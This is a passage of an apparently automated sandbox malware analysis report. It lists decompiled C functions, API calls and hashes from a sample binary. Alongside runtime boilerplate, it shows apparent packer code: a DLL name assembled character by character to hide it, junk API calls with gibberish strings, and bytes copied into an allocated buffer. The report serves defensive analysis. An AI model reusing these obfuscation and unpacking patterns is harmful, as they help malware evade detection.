                  • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                  • Instruction Fuzzy Hash: E0011A70C0425CEEDB15DBA8C5187EEBFB5AF45308F148099C4192B242D7B69B99CBA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 138 4112df-4112ee GetEnvironmentStringsW 139 4112f0-4112f3 138->139 140 4112f4-4112f7 138->140 141 411307-411310 call 40a295 140->141 142 4112f9-4112fe 140->142 145 411315-41131a 141->145 142->142 143 411300-411305 142->143 143->141 143->142 146 411329-411334 call 409f30 145->146 147 41131c-411328 FreeEnvironmentStringsW 145->147 146->147
                  C-Code - Quality: 100%
                  			E004112DF() {
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				WCHAR* _t1;
                  				void* _t5;
                  				void* _t18;
                  				WCHAR* _t20;
                  
                  				_t1 = GetEnvironmentStringsW();
                  				_t20 = _t1;
                  				if(_t20 != 0) {
                  					if( *_t20 != 0) {
                  						goto L3;
                  						do {
                  							do {
                  								L3:
                  								_t1 =  &(_t1[1]);
                  							} while ( *_t1 != 0);
                  							_t1 =  &(_t1[1]);
                  						} while ( *_t1 != 0);
                  					}
                  					_t13 = _t1 - _t20 + 2;
                  					_t5 = E0040A295(_t1 - _t20 + 2); // executed
                  					_t18 = _t5;
                  					if(_t18 != 0) {
                  						E00409F30(_t13, _t18, _t20, _t18, _t20, _t13);
                  					}
                  					FreeEnvironmentStringsW(_t20);
                  					return _t18;
                  				} else {
                  					return 0;
                  				}
                  			}










                  0x004112e2
                  0x004112e8
                  0x004112ee
                  0x004112f7
                  0x00000000
                  0x004112f9
                  0x004112f9
                  0x004112f9
                  0x004112fa
                  0x004112fb
                  0x00411301
                  0x00411302
                  0x004112f9
                  0x0041130c
                  0x00411310
                  0x00411315
                  0x0041131a
                  0x0041132c
                  0x00411331
                  0x0041131d
                  0x00411328
                  0x004112f0
                  0x004112f3
                  0x004112f3

                  APIs
                  • GetEnvironmentStringsW.KERNEL32(00000000,00409432), ref: 004112E2
                  • __malloc_crt.LIBCMT ref: 00411310
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041131D
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: EnvironmentStrings$Free__malloc_crt
                  • String ID:
                  • API String ID: 237123855-0
                  • Opcode ID: a88408b8304d12008ab2b2978674a95c1f1d56b5c3dde02752526f287eeb7ebf
                  • Instruction ID: 12b9bbb320df55b64a6d4fb98f6373968a5016189888f39b05d51ecead3a8373
                  • Opcode Fuzzy Hash: a88408b8304d12008ab2b2978674a95c1f1d56b5c3dde02752526f287eeb7ebf
                  • Instruction Fuzzy Hash: 39F0E23A6001215EEA2177347C448F7162CDA8A329315447BFAA2D3260FA384CC282A8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 150 404f21-404f97 LoadLibraryW
                  C-Code - Quality: 100%
                  			E00404F21() {
                  				short _t1;
                  				short _t2;
                  				short _t3;
                  				short _t5;
                  				short _t6;
                  				short _t7;
                  				short _t8;
                  				short _t9;
                  				short _t10;
                  				short _t11;
                  				short _t12;
                  				struct HINSTANCE__* _t13;
                  
                  				_t1 = 0x6d;
                  				 *0x587400 = _t1;
                  				_t2 = 0x73;
                  				 *0x587402 = _t2;
                  				_t3 = 0x33;
                  				 *0x58740a = _t3;
                  				 *0x587416 = 0;
                  				_t5 = 0x67;
                  				 *0x587408 = _t5;
                  				_t6 = 0x64;
                  				 *0x587410 = _t6;
                  				_t7 = 0x6d;
                  				 *0x587406 = _t7;
                  				_t8 = 0x6c;
                  				 *0x587412 = _t8;
                  				_t9 = 0x2e;
                  				 *0x58740e = _t9;
                  				_t10 = 0x6c;
                  				 *0x587414 = _t10;
                  				_t11 = 0x32;
                  				 *0x58740c = _t11;
                  				_t12 = 0x69;
                  				 *0x587404 = _t12; // executed
                  				_t13 = LoadLibraryW(0x587400); // executed
                  				return _t13;
                  			}















                  0x00404f23
                  0x00404f26
                  0x00404f2c
                  0x00404f2f
                  0x00404f35
                  0x00404f38
                  0x00404f40
                  0x00404f46
                  0x00404f49
                  0x00404f4f
                  0x00404f52
                  0x00404f58
                  0x00404f5b
                  0x00404f61
                  0x00404f64
                  0x00404f6a
                  0x00404f6d
                  0x00404f73
                  0x00404f76
                  0x00404f7c
                  0x00404f7f
                  0x00404f85
                  0x00404f8b
                  0x00404f91
                  0x00404f97

                  APIs
                  • LoadLibraryW.KERNELBASE(00587400,00405685), ref: 00404F91
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: e987b3369ab0c6f6085b7f1d849a831fed47046a39b8d015d54a4b17f4470c92
                  • Instruction ID: aa7a00a8e72513e4ada6ba9fe453f7306847f8bab2a8f60b11f4a8ec55921c34
                  • Opcode Fuzzy Hash: e987b3369ab0c6f6085b7f1d849a831fed47046a39b8d015d54a4b17f4470c92
                  • Instruction Fuzzy Hash: BAF0463565C384D4F94197E07D12B312F25EF58B14F30B817DE10DF1F1E2A28599A76A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 151 40e293-40e2b5 HeapCreate 152 40e2b7-40e2b8 151->152 153 40e2b9-40e2c2 151->153
                  C-Code - Quality: 100%
                  			E0040E293(intOrPtr _a4) {
                  				void* _t6;
                  
                  				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                  				 *0x589108 = _t6;
                  				if(_t6 != 0) {
                  					 *0x58add4 = 1;
                  					return 1;
                  				} else {
                  					return _t6;
                  				}
                  			}




                  0x0040e2a8
                  0x0040e2ae
                  0x0040e2b5
                  0x0040e2bc
                  0x0040e2c2
                  0x0040e2b8
                  0x0040e2b8
                  0x0040e2b8

                  APIs
                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040E2A8
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: CreateHeap
                  • String ID:
                  • API String ID: 10892065-0
                  • Opcode ID: ffa02f77b6bb53ec4e1ef010e9bc7ec29d647c434355e41a0e65af76aab84b56
                  • Instruction ID: e98fc74eb4793bb7cc445aec71ec37972efa20053ed3a8de3df731bee56d6e2a
                  • Opcode Fuzzy Hash: ffa02f77b6bb53ec4e1ef010e9bc7ec29d647c434355e41a0e65af76aab84b56
                  • Instruction Fuzzy Hash: AFD05E725543456EEB005F71BC087723BDC9394395F148476BE0CD6290F575C590E704
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 154 40dc4e-40dc50 call 40dbdc 156 40dc55-40dc56 154->156
                  C-Code - Quality: 100%
                  			E0040DC4E() {
                  				void* _t1;
                  
                  				_t1 = E0040DBDC(0); // executed
                  				return _t1;
                  			}




                  0x0040dc50
                  0x0040dc56

                  APIs
                  • __encode_pointer.LIBCMT ref: 0040DC50
                    • Part of subcall function 0040DBDC: TlsGetValue.KERNEL32(00000000,?,0040DC55,00000000,004171A4,005892B0,00000000,00000314,?,0040FAEA,005892B0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040DBEE
                    • Part of subcall function 0040DBDC: TlsGetValue.KERNEL32(00000005,?,0040DC55,00000000,004171A4,005892B0,00000000,00000314,?,0040FAEA,005892B0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040DC05
                    • Part of subcall function 0040DBDC: RtlEncodePointer.NTDLL(00000000,?,0040DC55,00000000,004171A4,005892B0,00000000,00000314,?,0040FAEA,005892B0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040DC43
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: Value$EncodePointer__encode_pointer
                  • String ID:
                  • API String ID: 2585649348-0
                  • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                  • Instruction ID: 4969261f5061704365dab4174235f7146d742500c55d146da6a57eb89e31a67a
                  • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 160 405453-405466 GlobalAlloc
                  C-Code - Quality: 100%
                  			E00405453() {
                  				void* _t1;
                  
                  				_t1 = GlobalAlloc(0,  *0x588f80); // executed
                  				 *0x5838fc = _t1;
                  				return _t1;
                  			}




                  0x0040545b
                  0x00405461
                  0x00405466

                  APIs
                  • GlobalAlloc.KERNELBASE(00000000,004054E5), ref: 0040545B
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: AllocGlobal
                  • String ID:
                  • API String ID: 3761449716-0
                  • Opcode ID: 175c076e0ac82f8ee5407169409dadd0aff9c0ed96e46cdbc52e0097022909b3
                  • Instruction ID: fb0f946ae68964290f7f9a106d21fa1be0c7b389ce261cb7ec09a57e1e71c6f6
                  • Opcode Fuzzy Hash: 175c076e0ac82f8ee5407169409dadd0aff9c0ed96e46cdbc52e0097022909b3
                  • Instruction Fuzzy Hash: 10B012700053008BCB000F50AC06B143A71F754702F441054FE40A0178DB300148BF00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004124FC(signed int __eax, void* __esi) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				char _v20;
                  				signed int _t142;
                  				signed int _t145;
                  				signed int _t148;
                  				signed int _t151;
                  				signed int _t154;
                  				signed int _t157;
                  				signed int _t159;
                  				signed int _t162;
                  				signed int _t165;
                  				signed int _t168;
                  				signed int _t171;
                  				signed int _t174;
                  				signed int _t177;
                  				signed int _t180;
                  				signed int _t183;
                  				signed int _t186;
                  				signed int _t189;
                  				signed int _t192;
                  				signed int _t195;
                  				signed int _t198;
                  				signed int _t201;
                  				signed int _t204;
                  				signed int _t207;
                  				signed int _t210;
                  				signed int _t213;
                  				signed int _t216;
                  				signed int _t219;
                  				signed int _t222;
                  				signed int _t225;
                  				signed int _t228;
                  				signed int _t231;
                  				signed int _t234;
                  				signed int _t237;
                  				signed int _t240;
                  				signed int _t243;
                  				signed int _t246;
                  				signed int _t249;
                  				signed int _t252;
                  				signed int _t255;
                  				signed int _t258;
                  				signed int _t261;
                  				signed int _t264;
                  				signed int _t267;
                  				signed int _t270;
                  				signed int _t276;
                  
                  				_t278 =  *(__eax + 0x42) & 0x0000ffff;
                  				_t279 =  *(__eax + 0x44) & 0x0000ffff;
                  				_v8 =  *(__eax + 0x42) & 0x0000ffff;
                  				_v12 =  *(__eax + 0x44) & 0x0000ffff;
                  				if(__esi != 0) {
                  					_v16 = _v16 & 0x00000000;
                  					_v20 = __eax;
                  					_t142 = E00411FE0(_t279,  &_v20, 1, _t278, 0x31, __esi + 4);
                  					_t145 = E00411FE0(_t279,  &_v20, 1, _v8, 0x32, __esi + 8);
                  					_t148 = E00411FE0(_t279,  &_v20, 1, _v8, 0x33, __esi + 0xc);
                  					_t151 = E00411FE0(_t279,  &_v20, 1, _v8, 0x34, __esi + 0x10);
                  					_t154 = E00411FE0(_t279,  &_v20, 1, _v8, 0x35, __esi + 0x14);
                  					_t157 = E00411FE0(_t279,  &_v20, 1, _v8, 0x36, __esi + 0x18);
                  					_t159 = E00411FE0(_t279,  &_v20, 1, _v8, 0x37, __esi);
                  					_t162 = E00411FE0(_t279,  &_v20, 1, _v8, 0x2a, __esi + 0x20);
                  					_t165 = E00411FE0(_t279,  &_v20, 1, _v8, 0x2b, __esi + 0x24);
                  					_t168 = E00411FE0(_t279,  &_v20, 1, _v8, 0x2c, __esi + 0x28);
                  					_t171 = E00411FE0(_t279,  &_v20, 1, _v8, 0x2d, __esi + 0x2c);
                  					_t174 = E00411FE0(_t279,  &_v20, 1, _v8, 0x2e, __esi + 0x30);
                  					_t177 = E00411FE0(_t279,  &_v20, 1, _v8, 0x2f, __esi + 0x34);
                  					_t180 = E00411FE0(_t279,  &_v20, 1, _v8, 0x30, __esi + 0x1c);
                  					_t183 = E00411FE0(_t279,  &_v20, 1, _v8, 0x44, __esi + 0x38);
                  					_t186 = E00411FE0(_t279,  &_v20, 1, _v8, 0x45, __esi + 0x3c);
                  					_t189 = E00411FE0(_t279,  &_v20, 1, _v8, 0x46, __esi + 0x40);
                  					_t192 = E00411FE0(_t279,  &_v20, 1, _v8, 0x47, __esi + 0x44);
                  					_t195 = E00411FE0(_t279,  &_v20, 1, _v8, 0x48, __esi + 0x48);
                  					_t198 = E00411FE0(_t279,  &_v20, 1, _v8, 0x49, __esi + 0x4c);
                  					_t201 = E00411FE0(_t279,  &_v20, 1, _v8, 0x4a, __esi + 0x50);
                  					_t204 = E00411FE0(_t279,  &_v20, 1, _v8, 0x4b, __esi + 0x54);
                  					_t207 = E00411FE0(_t279,  &_v20, 1, _v8, 0x4c, __esi + 0x58);
                  					_t210 = E00411FE0(_t279,  &_v20, 1, _v8, 0x4d, __esi + 0x5c);
                  					_t213 = E00411FE0(_t279,  &_v20, 1, _v8, 0x4e, __esi + 0x60);
                  					_t216 = E00411FE0(_t279,  &_v20, 1, _v8, 0x4f, __esi + 0x64);
                  					_t219 = E00411FE0(_t279,  &_v20, 1, _v8, 0x38, __esi + 0x68);
                  					_t222 = E00411FE0(_t279,  &_v20, 1, _v8, 0x39, __esi + 0x6c);
                  					_t225 = E00411FE0(_t279,  &_v20, 1, _v8, 0x3a, __esi + 0x70);
                  					_t228 = E00411FE0(_t279,  &_v20, 1, _v8, 0x3b, __esi + 0x74);
                  					_t231 = E00411FE0(_t279,  &_v20, 1, _v8, 0x3c, __esi + 0x78);
                  					_t234 = E00411FE0(_t279,  &_v20, 1, _v8, 0x3d, __esi + 0x7c);
                  					_t237 = E00411FE0(_t279,  &_v20, 1, _v8, 0x3e, __esi + 0x80);
                  					_t240 = E00411FE0(_t279,  &_v20, 1, _v8, 0x3f, __esi + 0x84);
                  					_t243 = E00411FE0(_t279,  &_v20, 1, _v8, 0x40, __esi + 0x88);
                  					_t246 = E00411FE0(_t279,  &_v20, 1, _v8, 0x41, __esi + 0x8c);
                  					_t249 = E00411FE0(_t279,  &_v20, 1, _v8, 0x42, __esi + 0x90);
                  					_t252 = E00411FE0(_t279,  &_v20, 1, _v8, 0x43, __esi + 0x94);
                  					_t255 = E00411FE0(_t279,  &_v20, 1, _v8, 0x28, __esi + 0x98);
                  					_t258 = E00411FE0(_t279,  &_v20, 1, _v8, 0x29, __esi + 0x9c);
                  					_t261 = E00411FE0(_t279,  &_v20, 1, _v12, 0x1f, __esi + 0xa0);
                  					_t264 = E00411FE0(_t279,  &_v20, 1, _v12, 0x20, __esi + 0xa4);
                  					_t267 = E00411FE0(_t279,  &_v20, 1, _v12, 0x1003, __esi + 0xa8);
                  					_t276 = _v12;
                  					_t270 = E00411FE0(_t279,  &_v20, 0, _t276, 0x1009, __esi + 0xb0);
                  					 *(__esi + 0xac) = _t276;
                  					return _t142 | _t145 | _t148 | _t151 | _t154 | _t157 | _t159 | _t162 | _t165 | _t168 | _t171 | _t174 | _t177 | _t180 | _t183 | _t186 | _t189 | _t192 | _t195 | _t198 | _t201 | _t204 | _t207 | _t210 | _t213 | _t216 | _t219 | _t222 | _t225 | _t228 | _t231 | _t234 | _t237 | _t240 | _t243 | _t246 | _t249 | _t252 | _t255 | _t258 | _t261 | _t264 | _t267 | _t270;
                  				} else {
                  					return __eax | 0xffffffff;
                  				}
                  			}




















































                  0x00412504
                  0x00412508
                  0x0041250c
                  0x0041250f
                  0x00412514
                  0x0041251b
                  0x00412521
                  0x00412533
                  0x00412548
                  0x0041255d
                  0x00412572
                  0x0041258a
                  0x0041259f
                  0x004125b1
                  0x004125c6
                  0x004125de
                  0x004125f3
                  0x00412608
                  0x0041261d
                  0x00412635
                  0x0041264a
                  0x0041265f
                  0x00412674
                  0x0041268c
                  0x004126a1
                  0x004126b6
                  0x004126cb
                  0x004126e3
                  0x004126f8
                  0x0041270d
                  0x00412722
                  0x0041273a
                  0x0041274f
                  0x00412764
                  0x00412779
                  0x00412791
                  0x004127a6
                  0x004127bb
                  0x004127d0
                  0x004127eb
                  0x00412803
                  0x0041281b
                  0x00412833
                  0x0041284e
                  0x00412866
                  0x0041287e
                  0x00412896
                  0x004128b1
                  0x004128c9
                  0x004128e4
                  0x004128f7
                  0x00412901
                  0x0041290e
                  0x00412916
                  0x00412516
                  0x0041251a
                  0x0041251a

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: ___getlocaleinfo
                  • String ID:
                  • API String ID: 1937885557-0
                  • Opcode ID: 67d2691e74c5941d2eb3c1619365f0b8b77928823da057a98be69eddb7686c32
                  • Instruction ID: 990fea533c6ed410193014a0fb1ff9291efc675f3eb50e117d1a0606e3a22653
                  • Opcode Fuzzy Hash: 67d2691e74c5941d2eb3c1619365f0b8b77928823da057a98be69eddb7686c32
                  • Instruction Fuzzy Hash: 84E1DCB2A0020DBEEB11DBF18C81DFF77BDEB04788F15092AB215A2051EA74AB459764
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E00405224(intOrPtr _a4) {
                  				CHAR* _v8;
                  				long _v12;
                  				long _v16;
                  				struct _OSVERSIONINFOA _v164;
                  				struct _OSVERSIONINFOEXW _v448;
                  				char _v1472;
                  				char _v2496;
                  				void _v3520;
                  				char _v4544;
                  				intOrPtr _t16;
                  
                  				E004084E0(0x11bc);
                  				if( *0x588f80 == 0x37) {
                  					CallNamedPipeA("Cokejizufo guhicotijeteme wadofiwa rozujotucixo", 0, 0,  &_v3520, 0,  &_v16, 0);
                  					GetThreadPriority(0);
                  					SearchPathA(0, 0, 0, 0,  &_v1472,  &_v8);
                  					OpenEventA(0, 0, "mugokateripayasojelihupurizarumi");
                  					FindResourceW(0, 0, 0);
                  					GetVersionExA( &_v164);
                  					SetWaitableTimer(0, 0, 0, 0, 0, 0);
                  					CopyFileW(0, 0, 0);
                  					WriteConsoleInputA(0, 0, 0,  &_v12);
                  					SizeofResource(0, 0);
                  					GlobalDeleteAtom(0);
                  					lstrlenW(L"Jefub");
                  					GetModuleHandleA(0);
                  					GetWindowsDirectoryA( &_v2496, 0);
                  					MapViewOfFileEx(0, 0, 0, 0, 0, 0);
                  					GlobalGetAtomNameA(0,  &_v4544, 0);
                  					DebugBreak();
                  					LocalUnlock(0);
                  					_push(0);
                  					VerifyVersionInfoW( &_v448, 0, 0);
                  				}
                  				_t16 = _a4;
                  				 *((char*)( *0x5838fc + _t16)) =  *((intOrPtr*)( *0x588f84 + _t16 + 0x38d6));
                  				return _t16;
                  			}













                  0x0040522c
                  0x00405238
                  0x00405255
                  0x0040525c
                  0x00405271
                  0x0040527e
                  0x00405287
                  0x00405294
                  0x004052a0
                  0x004052a9
                  0x004052b6
                  0x004052be
                  0x004052c5
                  0x004052d0
                  0x004052d7
                  0x004052e5
                  0x004052f1
                  0x00405300
                  0x00405306
                  0x0040530d
                  0x00405313
                  0x0040531d
                  0x00405323
                  0x00405324
                  0x0040533a
                  0x0040533e

                  APIs
                  • CallNamedPipeA.KERNEL32(Cokejizufo guhicotijeteme wadofiwa rozujotucixo,00000000,00000000,?,00000000,?,00000000), ref: 00405255
                  • GetThreadPriority.KERNEL32(00000000), ref: 0040525C
                  • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00405271
                  • OpenEventA.KERNEL32(00000000,00000000,mugokateripayasojelihupurizarumi), ref: 0040527E
                  • FindResourceW.KERNEL32(00000000,00000000,00000000), ref: 00405287
                  • GetVersionExA.KERNEL32(?), ref: 00405294
                  • SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004052A0
                  • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 004052A9
                  • WriteConsoleInputA.KERNEL32(00000000,00000000,00000000,?), ref: 004052B6
                  • SizeofResource.KERNEL32(00000000,00000000), ref: 004052BE
                  • GlobalDeleteAtom.KERNEL32 ref: 004052C5
                  • lstrlenW.KERNEL32(Jefub), ref: 004052D0
                  • GetModuleHandleA.KERNEL32(00000000), ref: 004052D7
                  • GetWindowsDirectoryA.KERNEL32(?,00000000), ref: 004052E5
                  • MapViewOfFileEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004052F1
                  • GlobalGetAtomNameA.KERNEL32 ref: 00405300
                  • DebugBreak.KERNEL32 ref: 00405306
                  • LocalUnlock.KERNEL32(00000000), ref: 0040530D
                  • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 0040531D
                  Strings
                  • Jefub, xrefs: 004052CB
                  • mugokateripayasojelihupurizarumi, xrefs: 00405277
                  • Cokejizufo guhicotijeteme wadofiwa rozujotucixo, xrefs: 00405250
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: AtomFileGlobalResourceVersion$BreakCallConsoleCopyDebugDeleteDirectoryEventFindHandleInfoInputLocalModuleNameNamedOpenPathPipePrioritySearchSizeofThreadTimerUnlockVerifyViewWaitableWindowsWritelstrlen
                  • String ID: Cokejizufo guhicotijeteme wadofiwa rozujotucixo$Jefub$mugokateripayasojelihupurizarumi
                  • API String ID: 3795951309-3625322140
                  • Opcode ID: ebc8b4d0c68ac744456d7a0e7200c09a68174984a35a494266cd778d7d05b6d1
                  • Instruction ID: 67f5db39aa5df4ee65176f0c27e6e29ae3a6aa7c7a8f56d29e27dc29f0dd7039
                  • Opcode Fuzzy Hash: ebc8b4d0c68ac744456d7a0e7200c09a68174984a35a494266cd778d7d05b6d1
                  • Instruction Fuzzy Hash: 0C31D872402568BBD721ABA1AE4CDDF7F6CEF0A391B004066F64AE1520C7385685CBB9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E0040A40B(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                  				intOrPtr _v0;
                  				void* _v804;
                  				intOrPtr _v808;
                  				intOrPtr _v812;
                  				intOrPtr _t6;
                  				intOrPtr _t11;
                  				intOrPtr _t12;
                  				intOrPtr _t13;
                  				long _t17;
                  				intOrPtr _t21;
                  				intOrPtr _t22;
                  				intOrPtr _t25;
                  				intOrPtr _t26;
                  				intOrPtr _t27;
                  				intOrPtr* _t31;
                  				void* _t34;
                  
                  				_t27 = __esi;
                  				_t26 = __edi;
                  				_t25 = __edx;
                  				_t22 = __ecx;
                  				_t21 = __ebx;
                  				_t6 = __eax;
                  				_t34 = _t22 -  *0x4307fc; // 0xbd89b0be
                  				if(_t34 == 0) {
                  					asm("repe ret");
                  				}
                  				 *0x589930 = _t6;
                  				 *0x58992c = _t22;
                  				 *0x589928 = _t25;
                  				 *0x589924 = _t21;
                  				 *0x589920 = _t27;
                  				 *0x58991c = _t26;
                  				 *0x589948 = ss;
                  				 *0x58993c = cs;
                  				 *0x589918 = ds;
                  				 *0x589914 = es;
                  				 *0x589910 = fs;
                  				 *0x58990c = gs;
                  				asm("pushfd");
                  				_pop( *0x589940);
                  				 *0x589934 =  *_t31;
                  				 *0x589938 = _v0;
                  				 *0x589944 =  &_a4;
                  				 *0x589880 = 0x10001;
                  				_t11 =  *0x589938; // 0x0
                  				 *0x589834 = _t11;
                  				 *0x589828 = 0xc0000409;
                  				 *0x58982c = 1;
                  				_t12 =  *0x4307fc; // 0xbd89b0be
                  				_v812 = _t12;
                  				_t13 =  *0x430800; // 0x42764f41
                  				_v808 = _t13;
                  				 *0x589878 = IsDebuggerPresent();
                  				_push(1);
                  				E0040F12C(_t14);
                  				SetUnhandledExceptionFilter(0);
